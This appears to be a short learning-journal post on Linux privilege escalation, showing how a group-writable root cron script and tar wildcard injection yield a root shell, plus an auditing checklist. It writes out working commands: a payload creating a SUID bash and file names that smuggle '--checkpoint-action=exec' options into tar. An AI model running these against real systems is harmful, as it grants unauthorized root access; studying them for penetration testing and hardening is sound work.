Day 30: Wildcard Injection & Cron Jobs — The Automation Trap 🕵️‍♂️

🛠️ The "Automation-to-Root" Pipeline

1. Writable Cron Script (The Group Privilege Trap)

Sometimes a script isn't world-writable, but it is writable by a Group you belong to.

• The Scenario: A root cron job runs /usr/local/bin/backup.sh. The script is owned by root:dev with 774 permissions.
• The Exploit: If you are in the dev group, you can append a payload to create a SUID bash: echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /usr/local/bin/backup.sh
• The Result: Within a minute, /tmp/rootbash -p gives you a root shell.

2. Wildcard Injection (The "tar" Trick)

This is a classic OSCP-style exploit. If a root cron job runs:
tar -czf /tmp/backup.tar.gz /var/www/html/*
And /var/www/html/ is world-writable, the * expands to include every filename in that folder as a command-line argument.

• The Injection: I created files that tar interprets as options:
  1. touch /var/www/html/--checkpoint=1
  2. touch /var/www/html/--checkpoint-action=exec=sh\ exploit.sh
• The Mechanism: When tar runs, it sees --checkpoint=1 as a flag, not a filename, and executes exploit.sh as root.

🕵️‍♂️ The "Wildcard Hunt" Checklist

When auditing a new machine, I now specifically look for:

1. Cron Jobs: Any command in /etc/crontab that uses a *.
2. Utilities: tar, rsync, and 7z are high-priority targets for argument injection.
3. Shared Folders: /var/www/html, /tmp, and /opt are common places where wildcards and world-writable permissions meet.

Follow my journey: #1HourADayJourney